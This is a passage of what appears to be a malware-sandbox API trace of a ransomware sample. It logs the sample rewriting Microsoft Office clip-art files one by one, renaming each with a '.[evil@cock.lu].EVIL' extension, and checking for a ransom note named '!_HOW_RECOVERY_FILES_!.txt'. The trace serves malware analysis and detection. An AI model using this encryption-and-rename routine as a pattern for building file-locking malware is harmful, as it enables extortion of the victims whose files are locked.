lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0153.006] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1df8, lpOverlapped=0x0) returned 1 [0153.015] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.015] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.015] _errno () returned 0x84b1160840 [0153.015] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.015] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x1e00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1e00, lpOverlapped=0x0) returned 1 [0153.015] CloseHandle (hObject=0x1a8) returned 1 [0153.015] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240157.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0153.015] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0153.016] __uncaught_exception () returned 0x84b1160800 [0153.016] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0153.016] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240157.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0240157.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240157.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0240157.wmf.[evil@cock.lu].evil")) returned 1 [0153.017] ??_V@YAXPEAX@Z () returned 0x1 [0153.020] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240157.WMF", dwFileAttributes=0x200) returned 0 [0153.020] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0153.020] wcsstr (_Str="J0240175.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0153.020] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240175.WMF") returned 69 [0153.020] wcscmp (_String1="J0240175.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0153.020] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0240175.WMF") returned 0x0 [0153.020] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240175.WMF") returned 0x45 [0153.020] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240175.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0240175.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0153.047] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xa410, lpOverlapped=0x0) returned 1 [0153.062] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.062] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.062] _errno () returned 0x84b1160840 [0153.062] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.062] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0xa420, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xa420, lpOverlapped=0x0) returned 1 [0153.062] CloseHandle (hObject=0x1a8) returned 1 [0153.062] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240175.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0153.062] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0153.062] __uncaught_exception () returned 0x84b1160800 [0153.062] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0153.063] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240175.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0240175.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240175.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0240175.wmf.[evil@cock.lu].evil")) returned 1 [0153.064] ??_V@YAXPEAX@Z () returned 0x1 [0153.067] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240175.WMF", dwFileAttributes=0x200) returned 0 [0153.067] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0153.067] wcsstr (_Str="J0240189.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0153.067] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240189.WMF") returned 69 [0153.067] wcscmp (_String1="J0240189.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0153.067] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0240189.WMF") returned 0x0 [0153.067] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240189.WMF") returned 0x45 [0153.067] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240189.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0240189.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0153.069] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xdc4, lpOverlapped=0x0) returned 1 [0153.082] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.082] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.082] _errno () returned 0x84b1160840 [0153.082] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.082] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0xde0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xde0, lpOverlapped=0x0) returned 1 [0153.083] CloseHandle (hObject=0x1a8) returned 1 [0153.083] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240189.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0153.083] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0153.083] __uncaught_exception () returned 0x84b1160800 [0153.083] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0153.083] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240189.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0240189.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240189.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0240189.wmf.[evil@cock.lu].evil")) returned 1 [0153.084] ??_V@YAXPEAX@Z () returned 0x1 [0153.087] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240189.WMF", dwFileAttributes=0x200) returned 0 [0153.087] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0153.094] wcsstr (_Str="J0240291.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0153.094] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240291.WMF") returned 69 [0153.094] wcscmp (_String1="J0240291.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0153.094] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0240291.WMF") returned 0x0 [0153.094] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240291.WMF") returned 0x45 [0153.094] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240291.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0240291.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0153.096] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1476, lpOverlapped=0x0) returned 1 [0153.104] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.104] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.104] _errno () returned 0x84b1160840 [0153.104] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.104] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x1480, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1480, lpOverlapped=0x0) returned 1 [0153.104] CloseHandle (hObject=0x1a8) returned 1 [0153.104] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240291.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0153.104] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0153.104] __uncaught_exception () returned 0x84b1160800 [0153.104] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0153.105] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240291.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0240291.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240291.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0240291.wmf.[evil@cock.lu].evil")) returned 1 [0153.105] ??_V@YAXPEAX@Z () returned 0x1 [0153.109] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240291.WMF", dwFileAttributes=0x200) returned 0 [0153.109] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0153.109] wcsstr (_Str="J0241019.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0153.109] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241019.WMF") returned 69 [0153.109] wcscmp (_String1="J0241019.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0153.109] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0241019.WMF") returned 0x0 [0153.109] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241019.WMF") returned 0x45 [0153.109] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241019.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241019.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0153.111] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x92e, lpOverlapped=0x0) returned 1 [0153.120] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.120] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.120] _errno () returned 0x84b1160840 [0153.120] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.120] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x940, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x940, lpOverlapped=0x0) returned 1 [0153.120] CloseHandle (hObject=0x1a8) returned 1 [0153.120] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241019.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0153.120] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0153.121] __uncaught_exception () returned 0x84b1160800 [0153.121] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0153.121] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241019.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241019.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241019.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241019.wmf.[evil@cock.lu].evil")) returned 1 [0153.122] ??_V@YAXPEAX@Z () returned 0x1 [0153.125] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241019.WMF", dwFileAttributes=0x200) returned 0 [0153.125] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0153.126] wcsstr (_Str="J0241037.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0153.126] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241037.WMF") returned 69 [0153.126] wcscmp (_String1="J0241037.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0153.126] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0241037.WMF") returned 0x0 [0153.126] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241037.WMF") returned 0x45 [0153.126] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241037.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241037.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0153.128] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xa4e, lpOverlapped=0x0) returned 1 [0153.137] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.137] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.137] _errno () returned 0x84b1160840 [0153.137] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.137] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0xa60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xa60, lpOverlapped=0x0) returned 1 [0153.138] CloseHandle (hObject=0x1a8) returned 1 [0153.138] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241037.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0153.138] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0153.138] __uncaught_exception () returned 0x84b1160800 [0153.138] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0153.138] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241037.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241037.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241037.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241037.wmf.[evil@cock.lu].evil")) returned 1 [0153.142] ??_V@YAXPEAX@Z () returned 0x1 [0153.146] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241037.WMF", dwFileAttributes=0x200) returned 0 [0153.146] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0153.146] wcsstr (_Str="J0241041.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0153.146] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241041.WMF") returned 69 [0153.146] wcscmp (_String1="J0241041.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0153.146] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0241041.WMF") returned 0x0 [0153.146] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241041.WMF") returned 0x45 [0153.146] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241041.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241041.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0153.148] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x926, lpOverlapped=0x0) returned 1 [0153.157] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.157] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.157] _errno () returned 0x84b1160840 [0153.157] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.158] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x940, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x940, lpOverlapped=0x0) returned 1 [0153.158] CloseHandle (hObject=0x1a8) returned 1 [0153.158] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241041.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0153.158] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0153.158] __uncaught_exception () returned 0x84b1160800 [0153.158] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0153.158] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241041.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241041.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241041.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241041.wmf.[evil@cock.lu].evil")) returned 1 [0153.160] ??_V@YAXPEAX@Z () returned 0x1 [0153.164] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241041.WMF", dwFileAttributes=0x200) returned 0 [0153.164] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0153.164] wcsstr (_Str="J0241043.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0153.164] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241043.WMF") returned 69 [0153.164] wcscmp (_String1="J0241043.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0153.164] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0241043.WMF") returned 0x0 [0153.164] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241043.WMF") returned 0x45 [0153.164] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241043.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241043.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0153.166] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xab2, lpOverlapped=0x0) returned 1 [0153.202] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.202] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.202] _errno () returned 0x84b1160840 [0153.202] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.202] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0xac0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xac0, lpOverlapped=0x0) returned 1 [0153.202] CloseHandle (hObject=0x1a8) returned 1 [0153.202] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241043.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0153.203] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0153.203] __uncaught_exception () returned 0x84b1160800 [0153.203] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0153.203] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241043.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241043.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241043.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241043.wmf.[evil@cock.lu].evil")) returned 1 [0153.204] ??_V@YAXPEAX@Z () returned 0x1 [0153.207] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241043.WMF", dwFileAttributes=0x200) returned 0 [0153.207] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0153.207] wcsstr (_Str="J0241077.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0153.207] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241077.WMF") returned 69 [0153.207] wcscmp (_String1="J0241077.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0153.207] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0241077.WMF") returned 0x0 [0153.207] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241077.WMF") returned 0x45 [0153.207] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241077.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241077.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0153.209] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x82a, lpOverlapped=0x0) returned 1 [0153.218] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.218] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.218] _errno () returned 0x84b1160840 [0153.218] SetFilePointer (in: hFile=0x1a8, 